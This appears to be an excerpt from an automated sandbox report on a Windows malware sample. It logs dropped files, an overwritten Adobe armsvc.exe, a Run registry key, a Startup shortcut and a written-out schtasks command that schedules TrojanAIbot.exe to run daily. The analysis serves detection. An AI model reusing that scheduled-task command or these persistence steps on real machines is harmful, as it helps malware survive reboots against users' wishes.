                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02E7AB1C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
